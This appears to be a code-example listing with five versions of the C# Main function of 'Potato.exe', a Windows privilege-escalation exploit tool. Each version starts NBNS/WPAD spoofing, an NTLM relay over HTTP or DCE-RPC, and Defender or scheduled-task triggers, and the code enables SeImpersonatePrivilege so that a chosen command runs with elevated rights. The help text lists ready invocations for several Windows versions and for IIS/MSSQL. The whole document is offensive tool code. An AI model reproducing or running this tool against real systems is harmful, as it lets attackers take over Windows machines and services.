Beispiel #1
0
        //
        static int Main(string[] args)
        {
            Dictionary <string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null, drop_first = null, enable_httpserver = null, spoof_address = null,
                   enable_dce = null, enable_exhaust = null, enable_spoof = null, enable_defender = null,
                   enable_defender_scan = null, schedule_task = null, spoof_host = "WPAD", enable_etw = null, enable_token = null;
            String wpad_exclude_str = "live.sysinternals.com";
            int    srvPort          = 80;

            if (argDict.ContainsKey("ip"))
            {
                ip = argDict["ip"];
            }
            if (argDict.ContainsKey("cmd"))
            {
                cmd = argDict["cmd"];
            }
            if (argDict.ContainsKey("enable_exhaust"))
            {
                enable_exhaust = argDict["enable_exhaust"];
            }
            if (argDict.ContainsKey("enable_httpserver"))
            {
                enable_httpserver = argDict["enable_httpserver"];
            }
            if (argDict.ContainsKey("enable_defender"))
            {
                enable_defender = argDict["enable_defender"];
            }
            if (argDict.ContainsKey("enable_defender_scan"))
            {
                enable_defender_scan = argDict["enable_defender_scan"];
            }
            if (argDict.ContainsKey("enable_spoof"))
            {
                enable_spoof = argDict["enable_spoof"];
            }
            if (argDict.ContainsKey("enable_etw"))
            {
                enable_etw = argDict["enable_etw"];
            }
            if (argDict.ContainsKey("spoof_host"))
            {
                spoof_host = argDict["spoof_host"];
            }
            if (argDict.ContainsKey("wpad_exclude"))
            {
                wpad_exclude_str = argDict["wpad_exclude"];
            }
            if (argDict.ContainsKey("schedule_task"))
            {
                schedule_task = argDict["schedule_task"];
            }
            if (argDict.ContainsKey("srv_port"))
            {
                srvPort = Int32.Parse(argDict["srv_port"]);
            }
            if (argDict.ContainsKey("enable_dce"))
            {
                enable_dce = argDict["enable_dce"];
            }
            if (argDict.ContainsKey("spoof_address"))
            {
                spoof_address = argDict["spoof_address"];
            }
            else
            {
                spoof_address = "127.0.0.1";
            }
            if (argDict.ContainsKey("drop_first_dcom"))
            {
                drop_first = argDict["drop_first_dcom"];
            }
            if (argDict.ContainsKey("enable_token"))
            {
                enable_token = argDict["enable_token"];
            }
            ;
            //
            if (args.Length > 0)
            {
                if (args[0].ToLower() == "-h" || args[0].ToLower() == "--h" || args[0].ToLower() == "-help" || args[0].ToLower() == "--help" || args[0].ToLower() == "/?")
                {
                    PrintHelp();
                    Console.WriteLine("\nExample Windows 7:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true");
                    Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -schedule_task true");
                    Console.WriteLine("\nExample Windows Server 2008:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true -spoof_host \"WPAD.DOMAIN.TLD\" ");
                    Console.WriteLine("\nExample Windows Server 2012:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true");
                    Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender_scan true");
                    Console.WriteLine("\nExample Enable WebClient:\nPotato.exe -enable_etw true\nPotato.exe -enable_etw 22b6d684-fa63-4578-87c9-effcbe6643c7");
                    Console.WriteLine("\nExample IIS/MSSQL/*:\nPotato.exe -enable_token true -enable_dce true");
                    Console.WriteLine("Potato.exe -enable_token true -enable_httpserver true -enable_defender_scan true -srv_port 9595");
                    Console.WriteLine("Potato.exe");
                    Environment.Exit(0);
                }
            }
            else
            {
                enable_token = "true";
                enable_dce   = "true";
            }
            //
            if (enable_token != null)
            {
                // Console.WriteLine("Enabiling your privs....");
                InvokePrivs.EnablePriv("SeImpersonatePrivilege");
            }
            //
            if (enable_etw != null)
            {
                EventTriggers.start_service(enable_etw);
            }
            //
            String[]        wpad_exclude     = wpad_exclude_str.Split(',');
            HTTPNtlmHandler httpServer       = new HTTPNtlmHandler();
            Thread          httpServerThread = null;

            if (enable_httpserver != null && enable_httpserver.Equals("true"))
            {
                httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort, enable_token));
                httpServerThread.Start();
            }
            //
            DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler();
            bool   dropFirst       = drop_first != null && drop_first.Equals("true");
            Thread bootstrapThread = null;
            Thread dcerpcThread    = null;

            if (enable_dce != null && enable_dce.Equals("true"))
            {
                dcerpcThread = new Thread(() => dcerpcServer.start("127.0.0.1", "6666", "127.0.0.1", "135", cmd, dropFirst, enable_token));
                dcerpcThread.Start();
                Thread.Sleep(100);
                try
                {
                    bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal());
                    bootstrapThread.Start();
                }
                catch (Exception e)
                {
                    Console.WriteLine("This wasn't supposed to happen... {0}", e);
                }
            }
            //
            Spoofer spoof         = new NBNSSpoofer();
            bool    enableExhaust = enable_exhaust != null && enable_exhaust.Equals("true");
            Thread  spoofThread   = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, enableExhaust));

            if (enable_spoof != null && enable_spoof.Equals("true"))
            {
                if (ip == null || spoof_address == null)
                {
                    Console.WriteLine("Need IP and spoof address for spoofing?");
                    Environment.Exit(0);
                }
                spoofThread.Start();
                if (enableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host, spoof_address);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }
            //
            UpdateLauncher updateL       = new UpdateLauncher();
            Thread         updateLThread = new Thread(() => updateL.launchUpdateCheck());

            if (enable_defender != null && enable_defender.Equals("true"))
            {
                updateLThread.Start();
            }
            //
            Thread scanLThread = new Thread(() => updateL.scan_file(srvPort));

            if (enable_defender_scan != null && enable_defender_scan.Equals("true"))
            {
                scanLThread.Start();
            }
            //
            ScheduleTask sc      = new ScheduleTask();
            Thread       schTask = new Thread(() => sc.schtask(srvPort));

            if (schedule_task != null && schedule_task.Equals("true"))
            {
                schTask.Start();
            }
            //
            if (httpServerThread != null)
            {
                httpServer.finished.WaitOne();
                httpServerThread.Abort();
            }
            //
            if (dcerpcThread != null)
            {
                DCERPCNtlmHandler.finished.WaitOne();
                dcerpcThread.Abort();
                bootstrapThread.Abort();
            }
            //
            spoofThread.Abort();
            updateLThread.Abort();
            scanLThread.Abort();
            Thread.Sleep(500);
            Environment.Exit(0);
            return(0);
        }
Beispiel #2
0
        static int Main(string[] args)
        {
            Dictionary <string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null, spoof_address = null, disable_exhaust = null, disable_spoof = null, disable_defender = null, schedule_task = null, spoof_host = "WPAD";

            String wpad_exclude_str = "live.sysinternals.com";
            int    srvPort          = 80;

            if (argDict.ContainsKey("ip"))
            {
                ip = argDict["ip"];
            }
            if (argDict.ContainsKey("cmd"))
            {
                cmd = argDict["cmd"];
            }
            if (argDict.ContainsKey("disable_exhaust"))
            {
                disable_exhaust = argDict["disable_exhaust"];
            }
            if (argDict.ContainsKey("disable_defender"))
            {
                disable_defender = argDict["disable_defender"];
            }
            if (argDict.ContainsKey("disable_spoof"))
            {
                disable_spoof = argDict["disable_spoof"];
            }
            if (argDict.ContainsKey("spoof_host"))
            {
                spoof_host = argDict["spoof_host"];
            }
            if (argDict.ContainsKey("wpad_exclude"))
            {
                wpad_exclude_str = argDict["wpad_exclude"];
            }
            if (argDict.ContainsKey("schedule_task"))
            {
                schedule_task = argDict["schedule_task"];
            }
            if (argDict.ContainsKey("srv_port"))
            {
                srvPort = Int32.Parse(argDict["srv_port"]);
            }
            if (argDict.ContainsKey("spoof_address"))
            {
                spoof_address = argDict["spoof_address"];
            }
            else
            {
                spoof_address = "127.0.0.1";
            }

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>");
                return(0);
            }
            bool disableExhaust = false;

            if (disable_exhaust != null && disable_exhaust.Equals("true"))
            {
                disableExhaust = true;
            }

            Spoofer spoof;

            spoof = new NBNSSpoofer();

            HTTPNtlmHandler httpServer = new HTTPNtlmHandler();

            String[] wpad_exclude     = wpad_exclude_str.Split(',');
            Thread   httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort));

            httpServerThread.Start();

            Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, disableExhaust));

            if (disable_spoof == null || disable_spoof.Equals("false"))
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host, spoof_address);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }

            UpdateLauncher updateL       = new UpdateLauncher();
            Thread         updateLThread = new Thread(() => updateL.launchUpdateCheck());

            if (disable_defender == null || disable_defender.Equals("false"))
            {
                updateLThread.Start();
            }

            ScheduleTask sc = new ScheduleTask();

            Thread schTask = new Thread(() => sc.schtask(srvPort));

            if (schedule_task != null && schedule_task.Equals("true"))
            {
                schTask.Start(srvPort);
            }

            httpServer.finished.WaitOne();
            spoofThread.Abort();
            updateLThread.Abort();
            httpServerThread.Abort();
            return(0);
        }
Beispiel #3
0
        static int Main(string[] args)
        {
            Dictionary<string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null, disable_exhaust = null, disable_spoof = null, disable_defender = null, spoof_host = "WPAD";
            String wpad_exclude_str="potatopotato.com";

            if (argDict.ContainsKey("ip")) ip = argDict["ip"];
            if (argDict.ContainsKey("cmd")) cmd = argDict["cmd"];
            if (argDict.ContainsKey("disable_exhaust")) disable_exhaust = argDict["disable_exhaust"];
            if (argDict.ContainsKey("disable_defender")) disable_defender = argDict["disable_defender"];
            if (argDict.ContainsKey("disable_spoof")) disable_spoof = argDict["disable_spoof"];
            if (argDict.ContainsKey("spoof_host")) spoof_host = argDict["spoof_host"];
            if (argDict.ContainsKey("wpad_exclude")) wpad_exclude_str = argDict["wpad_exclude"];

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -wpad_exclude <comma separated host to exclude, optional>");
                return 0;
            }
            bool disableExhaust = false;
            if (disable_exhaust != null && disable_exhaust.Equals("true"))
            {
                disableExhaust = true;
            }

            Spoofer spoof;
            spoof = new NBNSSpoofer();

            HTTPNtlmHandler httpServer = new HTTPNtlmHandler();
            String[] wpad_exclude = wpad_exclude_str.Split(',');
            Thread httpServerThread = new Thread(() => httpServer.startListening(cmd,wpad_exclude));
            httpServerThread.Start();

            Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, disableExhaust));

            if (disable_spoof == null || disable_spoof.Equals("false"))
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }

            UpdateLauncher updateL = new UpdateLauncher();
            Thread updateLThread = new Thread(() => updateL.launchUpdateCheck());
            if (disable_defender == null || disable_defender.Equals("false"))
            {
                updateLThread.Start();
            }

            httpServer.finished.WaitOne();
            spoofThread.Abort();
            updateLThread.Abort();
            httpServerThread.Abort();
            return 0;
        }
Beispiel #4
0
        static int Main(string[] args)
        {
            Dictionary <string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null, disable_exhaust = null, disable_spoof = null, disable_defender = null, spoof_host = "WPAD";
            String wpad_exclude_str = "potatopotato.com";

            if (argDict.ContainsKey("ip"))
            {
                ip = argDict["ip"];
            }
            if (argDict.ContainsKey("cmd"))
            {
                cmd = argDict["cmd"];
            }
            if (argDict.ContainsKey("disable_exhaust"))
            {
                disable_exhaust = argDict["disable_exhaust"];
            }
            if (argDict.ContainsKey("disable_defender"))
            {
                disable_defender = argDict["disable_defender"];
            }
            if (argDict.ContainsKey("disable_spoof"))
            {
                disable_spoof = argDict["disable_spoof"];
            }
            if (argDict.ContainsKey("spoof_host"))
            {
                spoof_host = argDict["spoof_host"];
            }
            if (argDict.ContainsKey("wpad_exclude"))
            {
                wpad_exclude_str = argDict["wpad_exclude"];
            }

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -wpad_exclude <comma separated host to exclude, optional>");
                return(0);
            }
            bool disableExhaust     = false;

            if (disable_exhaust != null && disable_exhaust.Equals("true"))
            {
                disableExhaust = true;
            }

            Spoofer spoof;

            spoof = new NBNSSpoofer();

            HTTPNtlmHandler httpServer = new HTTPNtlmHandler();

            String[] wpad_exclude     = wpad_exclude_str.Split(',');
            Thread   httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude));

            httpServerThread.Start();

            Thread spoofThread = new Thread(() => spoof.startSpoofing(ip, spoof_host, disableExhaust));

            if (disable_spoof == null || disable_spoof.Equals("false"))
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }

            UpdateLauncher updateL       = new UpdateLauncher();
            Thread         updateLThread = new Thread(() => updateL.launchUpdateCheck());

            if (disable_defender == null || disable_defender.Equals("false"))
            {
                updateLThread.Start();
            }

            httpServer.finished.WaitOne();
            spoofThread.Abort();
            updateLThread.Abort();
            httpServerThread.Abort();
            return(0);
        }
Beispiel #5
0
        static int Main(string[] args)
        {
            Dictionary<string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null,spoof_address = null,disable_exhaust = null, disable_spoof = null, disable_defender = null,schedule_task = null,spoof_host = "WPAD";

            String wpad_exclude_str="live.sysinternals.com";
            int srvPort = 80;

            if (argDict.ContainsKey("ip")) ip = argDict["ip"];
            if (argDict.ContainsKey("cmd")) cmd = argDict["cmd"];
            if (argDict.ContainsKey("disable_exhaust")) disable_exhaust = argDict["disable_exhaust"];
            if (argDict.ContainsKey("disable_defender")) disable_defender = argDict["disable_defender"];
            if (argDict.ContainsKey("disable_spoof")) disable_spoof = argDict["disable_spoof"];
            if (argDict.ContainsKey("spoof_host")) spoof_host = argDict["spoof_host"];
            if (argDict.ContainsKey("wpad_exclude")) wpad_exclude_str = argDict["wpad_exclude"];
            if (argDict.ContainsKey("schedule_task")) schedule_task = argDict["schedule_task"];
            if (argDict.ContainsKey("srv_port")) srvPort = Int32.Parse(argDict["srv_port"]);
            if (argDict.ContainsKey("spoof_address")) spoof_address = argDict["spoof_address"];
            else spoof_address = "127.0.0.1";

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>");
                return 0;
            }
            bool disableExhaust = false;
            if (disable_exhaust != null && disable_exhaust.Equals("true"))
            {
                disableExhaust = true;
            }

            Spoofer spoof;
            spoof = new NBNSSpoofer();

            HTTPNtlmHandler httpServer = new HTTPNtlmHandler();
            String[] wpad_exclude = wpad_exclude_str.Split(',');
            Thread httpServerThread = new Thread(() => httpServer.startListening(cmd,wpad_exclude,srvPort));
            httpServerThread.Start();

            Thread spoofThread = new Thread(() => spoof.startSpoofing(ip,spoof_host,spoof_address, disableExhaust));

            if (disable_spoof == null || disable_spoof.Equals("false"))
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host,spoof_address);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }

            UpdateLauncher updateL = new UpdateLauncher();
            Thread updateLThread = new Thread(() => updateL.launchUpdateCheck());
            if (disable_defender == null || disable_defender.Equals("false"))
            {
                updateLThread.Start();
            }

            ScheduleTask sc = new ScheduleTask();

            Thread schTask = new Thread(() => sc.schtask(srvPort));
            if (schedule_task != null && schedule_task.Equals("true"))
            {
                schTask.Start(srvPort);
            }

            httpServer.finished.WaitOne();
            spoofThread.Abort();
            updateLThread.Abort();
            httpServerThread.Abort();
            return 0;
        }